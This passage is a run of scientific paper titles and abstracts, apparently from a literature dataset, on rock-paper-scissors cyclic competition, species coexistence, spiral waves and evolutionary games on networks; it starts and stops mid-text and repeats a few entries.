M. W. Feldman and B. J. M. Bohannan Nature 418, 171 (2002)] and B. Kirkup and M. A. Riley Nature 428, 412 (2004)]. Through analytical methods supported by numerical simulations, we address this issue by studying the properties of a paradigmatic non-spatial three-species stochastic system, namely, the "rock-paper-scissors" or cyclic Lotka-Volterra model. While the deterministic approach (rate equations) predicts the coexistence of the species resulting in regular (yet neutrally stable) oscillations of the population densities, we demonstrate that fluctuations arising in the system with a finite number of agents drastically alter this picture and are responsible for extinction: After long enough time, two of the three species die out. As main findings we provide analytic estimates and numerical computation of the extinction probability at a given time. We also discuss the implications of our results for a broad class of competing population systems. --- paper_title: Chaotic Red Queen coevolution in three-species food chains paper_content: Coevolution between two antagonistic species follows the so-called ‘Red Queen dynamics’ when reciprocal selection results in an endless series of adaptation by one species and counteradaptation by the other. Red Queen dynamics are ‘genetically driven’ when selective sweeps involving new beneficial mutations result in perpetual oscillations of the coevolving traits on the slow evolutionary time scale. Mathematical models have shown that a prey and a predator can coevolve along a genetically driven Red Queen cycle. We found that embedding the prey–predator interaction into a three-species food chain that includes a coevolving superpredator often turns the genetically driven Red Queen cycle into chaos. A key condition is that the prey evolves fast enough. Red Queen chaos implies that the direction and strength of selection are intrinsically unpredictable beyond a short evolutionary time, with greatest evolutionary unpredictability in the superpredator. We hypothesize that genetically driven Red Queen chaos could explain why many natural populations are poised at the edge of ecological chaos. Over space, genetically driven chaos is expected to cause the evolutionary divergence of local populations, even under homogenizing environmental fluctuations, and thus to promote genetic diversity among ecological communities over long evolutionary time. --- paper_title: Continuous model for the rock-scissors-paper game between bacteriocin producing bacteria. paper_content: In this work, important aspects of bacteriocin producing bacteria and their interplay are elucidated. Various attempts to model the resistant, producer and sensitive Escherichia coli strains in the so-called rock–scissors–paper (RSP) game had been made in the literature. The question arose whether there is a continuous model with a cyclic structure and admitting an oscillatory dynamics as observed in various experiments. The May–Leonard system admits a Hopf bifurcation, which is, however, degenerate and hence inadequate. The traditional differential equation model of the RSP-game cannot be applied either to the bacteriocin system because it involves positive interaction terms. In this paper, a plausible competitive Lotka–Volterra system model of the RSP game is presented and the dynamics generated by that model is analyzed. For the first time, a continuous, spatially homogeneous model that describes the competitive interaction between bacteriocin-producing, resistant and sensitive bacteria is established. The interaction terms have negative coefficients. In some experiments, for example, in mice cultures, migration seemed to be essential for the reinfection in the RSP cycle. Often statistical and spatial effects such as migration and mutation are regarded to be essential for periodicity. Our model gives rise to oscillatory dynamics in the RSP game without such effects. Here, a normal form description of the limit cycle and conditions for its stability are derived. The toxicity of the bacteriocin is used as a bifurcation parameter. Exact parameter ranges are obtained for which a stable (robust) limit cycle and a stable heteroclinic cycle exist in the three-species game. These parameters are in good accordance with the observed relations for the E. coli strains. The roles of growth rate and growth yield of the three strains are discussed. Numerical calculations show that the sensitive, which might be regarded as the weakest, can have the longest sojourn times. --- paper_title: How community size affects survival chances in cyclic competition games that microorganisms play paper_content: Cyclic competition is a mechanism underlying biodiversity in nature and the competition between large numbers of interacting individuals under multifaceted environmental conditions. It is commonly modeled with the popular children’s rock-paper-scissors game. Here we probe cyclic competition systematically in a community of three strains of bacteria Escherichia coli. Recent experiments and simulations indicated the resistant strain of E. coli to win the competition. Other data, however, predicted the sensitive strain to be the final winner. We find a generic feature of cyclic competition that solves this puzzle: community size plays a decisive role in selecting the surviving competitor. Size-dependent effects arise from an easily detectable “period of quasiextinction” and may be tested in experiments. We briefly indicate how. --- paper_title: Three-fold way to extinction in populations of cyclically competing species paper_content: Species extinction occurs regularly and unavoidably in ecological systems. The time scales for extinction can vary broadly and provide information on the ecosystem's stability. We study the spatio-temporal extinction dynamics of a paradigmatic population model where three species exhibit cyclic competition. The cyclic dynamics reflects the non-equilibrium nature of the species interactions. While previous work focuses on the coarsening process as a mechanism that drives the system to extinction, we found that unexpectedly the dynamics in going to extinction is much richer. We observed dynamics of three different types. In addition to coarsening, in the evolutionarily relevant limit of large times, oscillating traveling waves and heteroclinic orbits play a dominant role. The weights of the different processes depend on the degree of mixing and the system size. By means of analytical arguments and extensive numerical simulations we provide the full characteristics of scenarios leading to extinction in one of the most surprising models of ecology. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments e.g., B. Kerr , Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: Vortex dynamics in a three-state model under cyclic dominance. paper_content: The evolution of domain structure is investigated in a two-dimensional voter model with three states under cyclic dominance. The study focus on the dynamics of vortices, defined by the points where the three states (domains) meet. We can distinguish vortices and antivortices which walk randomly and annihilate each other. The domain wall motion can create vortex-antivortex pairs at a rate that is increased by the spiral formation due to cyclic dominance. This mechanism is contrasted with a branching annihilating random walk (BARW) in a particle-antiparticle system with density-dependent pair creation rate. Numerical estimates for the critical indices of the vortex density [beta=0.29(4)] and of its fluctuation [gamma=0.34(6)] improve an earlier Monte Carlo study [K. Tainaka and Y. Itoh, Europhys. Lett. 15, 399 (1991)] of the three-state cyclic model in two dimensions. --- paper_title: Evolutionary game theory: Temporal and spatial effects beyond replicator dynamics paper_content: Evolutionary game dynamics is one of the most fruitful frameworks for studying evolution in different disciplines, from Biology to Economics. Within this context, the approach of choice for many researchers is the so-called replicator equation, that describes mathematically the idea that those individuals performing better have more offspring and thus their frequency in the population grows. While very many interesting results have been obtained with this equation in the three decades elapsed since it was first proposed, it is important to realize the limits of its applicability. One particularly relevant issue in this respect is that of non-mean-field effects, that may arise from temporal fluctuations or from spatial correlations, both neglected in the replicator equation. This review discusses these temporal and spatial effects focusing on the non-trivial modifications they induce when compared to the outcome of replicator dynamics. Alongside this question, the hypothesis of linearity and its relation to the choice of the rule for strategy update is also analyzed. The discussion is presented in terms of the emergence of cooperation, as one of the current key problems in Biology and in other disciplines. --- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. --- paper_title: Statistical mechanics of complex networks paper_content: The emergence of order in natural systems is a constant source of inspiration for both physical and biological sciences. While the spatial order characterizing for example the crystals has been the basis of many advances in contemporary physics, most complex systems in nature do not offer such high degree of order. Many of these systems form complex networks whose nodes are the elements of the system and edges represent the interactions between them. ::: Traditionally complex networks have been described by the random graph theory founded in 1959 by Paul Erdohs and Alfred Renyi. One of the defining features of random graphs is that they are statistically homogeneous, and their degree distribution (characterizing the spread in the number of edges starting from a node) is a Poisson distribution. In contrast, recent empirical studies, including the work of our group, indicate that the topology of real networks is much richer than that of random graphs. In particular, the degree distribution of real networks is a power-law, indicating a heterogeneous topology in which the majority of the nodes have a small degree, but there is a significant fraction of highly connected nodes that play an important role in the connectivity of the network. ::: The scale-free topology of real networks has very important consequences on their functioning. For example, we have discovered that scale-free networks are extremely resilient to the random disruption of their nodes. On the other hand, the selective removal of the nodes with highest degree induces a rapid breakdown of the network to isolated subparts that cannot communicate with each other. ::: The non-trivial scaling of the degree distribution of real networks is also an indication of their assembly and evolution. Indeed, our modeling studies have shown us that there are general principles governing the evolution of networks. Most networks start from a small seed and grow by the addition of new nodes which attach to the nodes already in the system. This process obeys preferential attachment: the new nodes are more likely to connect to nodes with already high degree. We have proposed a simple model based on these two principles wich was able to reproduce the power-law degree distribution of real networks. Perhaps even more importantly, this model paved the way to a new paradigm of network modeling, trying to capture the evolution of networks, not just their static topology. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Phase transitions for rock-scissors-paper game on different networks. paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Rock-scissors-paper game on regular small-world networks paper_content: The spatial rock-scissors-paper game (or cyclic Lotka–Volterra system) is extended to study how the spatiotemporal patterns are affected by the rewired host lattice providing uniform number of neighbours (degree) at each site. On the square lattice this system exhibits a self-organizing pattern with equal concentration of the competing strategies (species). If the quenched background is constructed by substituting random links for the nearest-neighbour bonds of a square lattice then a limit cycle occurs when the portion of random links exceeds a threshold value. This transition can also be observed if the standard link is replaced temporarily by a random one with a probability P at each step of iteration. Above a second threshold value of P the amplitude of global oscillation increases with time and finally the system reaches one of the homogeneous (absorbing) states. In this case the results of Monte Carlo simulations are compared with the predictions of the dynamical cluster technique evaluating all the configuration probabilities on one-, two-, four- and six-site clusters. --- paper_title: Networks with dispersed degrees save stable coexistence of species in cyclic competition paper_content: Coexistence of individuals with different species or phenotypes is often found in nature in spite of competition between them. Stable coexistence of multiple types of individuals have implications for maintenance of ecological biodiversity and emergence of altruism in society, to name a few. Various mechanisms of coexistence including spatial structure of populations, heterogeneous individuals, and heterogeneous environments, have been proposed. In reality, individuals disperse and interact on complex networks. We examine how heterogeneous degree distributions of networks influence coexistence, focusing on models of cyclically competing species. We show analytically and numerically that heterogeneity in degree distributions promotes stable coexistence. --- paper_title: Defined spatial structure stabilizes a synthetic multispecies bacterial community paper_content: This paper shows that for microbial communities, “fences make good neighbors.” Communities of soil microorganisms perform critical functions: controlling climate, enhancing crop production, and remediation of environmental contamination. Microbial communities in the oral cavity and the gut are of high biomedical interest. Understanding and harnessing the function of these communities is difficult: artificial microbial communities in the laboratory become unstable because of “winner-takes-all” competition among species. We constructed a community of three different species of wild-type soil bacteria with syntrophic interactions using a microfluidic device to control spatial structure and chemical communication. We found that defined microscale spatial structure is both necessary and sufficient for the stable coexistence of interacting bacterial species in the synthetic community. A mathematical model describes how spatial structure can balance the competition and positive interactions within the community, even when the rates of production and consumption of nutrients by species are mismatched, by exploiting nonlinearities of these processes. These findings provide experimental and modeling evidence for a class of communities that require microscale spatial structure for stability, and these results predict that controlling spatial structure may enable harnessing the function of natural and synthetic multispecies communities in the laboratory. --- paper_title: THE EVOLUTION OF RESTRAINT IN BACTERIAL BIOFILMS UNDER NONTRANSITIVE COMPETITION paper_content: Abstract Theoretical and empirical evidence indicates that competing species can coexist if dispersal, migration, and competitive interactions occur over relatively small spatial scales. In particular, spatial structure appears to be critical to certain communities with nontransitive competition. A typical nontransitive system involves three competing species that satisfy a relationship similar to the children's game of rock–paper–scissors. Although the ecological dynamics of nontransitive systems in spatially structured communities have received some attention, fewer studies have incorporated evolutionary change. Here we investigate evolution within toxic bacterial biofilms using an agent-based simulation that represents a nontransitive community containing three populations of Escherichia coli. In structured, nontransitive communities, strains evolve that do not maximize their competitive ability: They do not reduce their probability of death to a minimum or increase their toxicity to a maximum. That is... --- paper_title: Complex networks: Structure and dynamics paper_content: Coupled biological and chemical systems, neural networks, social interacting species, the Internet and the World Wide Web, are only a few examples of systems composed by a large number of highly interconnected dynamical units. The first approach to capture the global properties of such systems is to model them as graphs whose nodes represent the dynamical units, and whose links stand for the interactions between them. On the one hand, scientists have to cope with structural issues, such as characterizing the topology of a complex wiring architecture, revealing the unifying principles that are at the basis of real networks, and developing models to mimic the growth of a network and reproduce its structural properties. On the other hand, many relevant questions arise when studying complex networks’ dynamics, such as learning how a large ensemble of dynamical systems that interact through a complex wiring topology can behave collectively. We review the major concepts and results recently achieved in the study of the structure and dynamics of complex networks, and summarize the relevant applications of these ideas in many different disciplines, ranging from nonlinear science to biology, from statistical mechanics to medicine and engineering. © 2005 Elsevier B.V. All rights reserved. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists. With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems. A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. ::: ::: A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Resolving social dilemmas on evolving random networks paper_content: We show that strategy-independent adaptations of random interaction networks can induce powerful mechanisms, ranging from the Red Queen to group selection, which promote cooperation in evolutionary social dilemmas. These two mechanisms emerge spontaneously as dynamical processes due to deletions and additions of links, which are performed whenever players adopt new strategies and after a certain number of game iterations, respectively. The potency of cooperation promotion, as well as the mechanism responsible for it, can thereby be tuned via a single parameter determining the frequency of link additions. We thus demonstrate that coevolving random networks may evoke an appropriate mechanism for each social dilemma, such that cooperation prevails even in highly unfavorable conditions. --- paper_title: Population interaction structure and the coexistence of bacterial strains playing ‘rock-paper-scissors’ paper_content: The simplest example of non-transitive competition is the game rock–paper–scissors (RPS), which exhibits characteristic cyclic strategy replacement: paper beats rock, which in turn beats scissors, which in turn beats paper. In addition to its familiar use in understanding human decision-making, rock–paper–scissors is also played in many biological systems. Among other reasons, this is important because it potentially provides a mechanism whereby species- or strain coexistence can occur in the face of intense competition. Kerr et al. (2002, Nature 418: 171–174) use complementary experiments and simulations to show that RPS-playing toxic, resistant, and susceptible E. coli bacteria can coexist when interactions between the strains are spatially explicit. This raises the question of whether limited interactions associated with space are sufficient to allow strain coexistence, or whether space per se is crucial. I approach this question by extending the Kerr et al. model to include different (aspatial) population network structures with the same degree distributions as corresponding spatial lattice models. I show that the coexistence that occurs for some parameter combinations when simulated bacterial strains compete on lattices is absent when they compete on random regular graphs. Further, considering small-world networks of intermediate ‘quenched randomness’ between lattices and random regular graphs, I show that only small deviations from pure spatial interactions are sufficient to prevent strain coexistence. These results emphasize the explicit role of space, rather than merely limited interactions, as being decisive in allowing the coexistence of toxic, resistant, and susceptible strains in this model system. --- paper_title: Phase transitions for a rock–scissors–paper model with long-range-directed interactions paper_content: We have investigated a rock–scissors–paper model with long-range-directed interactions in two dimensions where every site has four outgoing links but a fraction q of the outgoing links to the nearest neighbour sites are rewired to other long-distance sites chosen randomly and the lattice structure is replaced again after a Monte Carlo step. It is found that, with q increasing, the system changes from a three species coexistence self-organizing state to a global oscillation state and then to one of the homogeneous states. However when q exceeds a third threshold value, the system returns to a self-organizing state. When we restrict the maximum number of ingoing links of a site to four, the last self-organizing state disappears, the system stays in the homogeneous state forever after q exceeds the second threshold value. And when we restrict the maximum number of ingoing links of a site to five or six, the system exhibits a transition from the homogeneous state to a global oscillation state again and then to the last self-organizing state with q increasing. The comparison of results on different networks suggests that the sites with zero ingoing links should play a significant role in the emergences of the later self-organizing state and the subsequent global oscillation. --- paper_title: Cyclic dominance in adaptive networks paper_content: The Rock-Paper-Scissors (RPS) game is a paradigmatic model for cyclic dominance in biological systems. Here we consider this game in the social context of competition between opinions in a networked society. In our model, every agent has an opinion which is drawn from the three choices: rock, paper or scissors. In every timestep a link is selected randomly and the game is played between the nodes connected by the link. The loser either adopts the opinion of the winner or rewires the link. These rules define an adaptive network on which the agents’ opinions coevolve with the network topology of social contacts. We show analytically and numerically that nonequilibrium phase transitions occur as a function of the rewiring strength. The transitions separate four distinct phases which differ in the observed dynamics of opinions and topology. In particular, there is one phase where the population settles to an arbitrary consensus opinion. We present a detailed analysis of the corresponding transitions revealing an apparently paradoxical behavior. The system approaches consensus states where they are unstable, whereas other dynamics prevail when the consensus states are stable. --- paper_title: Coevolutionary cycling of host sociality and pathogen virulence in contact networks. paper_content: Infectious diseases may place strong selection on the social organization of animals. Conversely, the structure of social systems can influence the evolutionary trajectories of pathogens. While much attention has focused on the evolution of host sociality or pathogen virulence separately, few studies have looked at their coevolution. Here we use an agent-based simulation to explore host-pathogen coevolution in social contact networks. Our results indicate that under certain conditions, both host sociality and pathogen virulence exhibit continuous cycling. The way pathogens move through the network (e.g., their interhost transmission and probability of superinfection) and the structure of the network can influence the existence and form of cycling. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Phase transitions for rock-scissors-paper game on different networks. paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Emergence of multilevel selection in the prisoner's dilemma game on coevolving random networks paper_content: We study the evolution of cooperation in the prisoner's dilemma game, whereby a coevolutionary rule is introduced that molds the random topology of the interaction network in two ways. First, existing links are deleted whenever a player adopts a new strategy or its degree exceeds a threshold value; second, new links are added randomly after a given number of game iterations. These coevolutionary processes correspond to the generic formation of new links and deletion of existing links that, especially in human societies, appear frequently as a consequence of ongoing socialization, change of lifestyle or death. Due to the counteraction of deletions and additions of links the initial heterogeneity of the interaction network is qualitatively preserved, and thus cannot be held responsible for the observed promotion of cooperation. Indeed, the coevolutionary rule evokes the spontaneous emergence of a powerful multilevel selection mechanism, which despite the sustained random topology of the evolving network, maintains cooperation across the whole span of defection temptation values. --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: Mobility-Dependent Selection of Competing Strategy Associations paper_content: Standard models of population dynamics focus on the interaction, survival, and extinction of the competing species individually. Real ecological systems, however, are characterized by an abundance of species (or strategies, in the terminology of evolutionary-game theory) that form intricate, complex interaction networks. The description of the ensuing dynamics may be aided by studying associations of certain strategies rather than individual ones. Here we show how such a higher-level description can bear fruitful insight. Motivated from different strains of colicinogenic Escherichia coli bacteria, we investigate a four-strategy system which contains a three-strategy cycle and a neutral alliance of two strategies. We find that the stochastic, spatial model exhibits a mobility-dependent selection of either the three-strategy cycle or of the neutral pair. We analyze this intriguing phenomenon numerically and analytically. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Discriminating the effects of spatial extent and population size in cyclic competition among species paper_content: We introduce a population model for species under cyclic competition. This model allows individuals to coexist and interact on single cells while migration takes place between adjacent cells. In contrast to the model introduced by Reichenbach, Mobilia, and Frey [Reichenbach, Mobilia, and Frey, Nature (London) 448, 1046 (2007)], we find that the emergence of spirals results in an ambiguous behavior regarding the stability of coexistence. The typical time until extinction exhibits, however, a qualitatively opposite dependence on the newly introduced nonunit carrying capacity in the spiraling and the nonspiraling regimes. This allows us to determine a critical mobility that marks the onset of this spiraling state sharply. In contrast, we demonstrate that the conventional finite size stability analysis with respect to spatial size is of limited use for identifying the onset of the spiraling regime. --- paper_title: Basins of attraction for species extinction and coexistence in spatial rock-paper-scissors games paper_content: We study the collective dynamics of mobile species under cyclic competition by breaking the symmetry in the initial populations and examining the basins of the two distinct asymptotic states: extinction and coexistence, the latter maintaining biodiversity. We find a rich dependence of dynamical properties on initial conditions. In particular, for high mobility, only extinction basins exist and they are spirally entangled, but a basin of coexistence emerges when the mobility parameter is decreased through a critical value, whose area increases monotonically as the parameter is further decreased. The structure of extinction basins for high mobility can be predicted by a mean-field theory. These results provide a more comprehensive picture for the fundamental issue of species coexistence than previously achieved. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: Vertex dynamics during domain growth in three-state models paper_content: Topological aspects of interfaces are studied by comparing quantitatively the evolving three-color patterns in three different models, such as the three-state voter, Potts, and extended voter models. The statistical analysis of some geometrical features allows us to explore the role of different elementary processes during distinct coarsening phenomena in the above models. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate 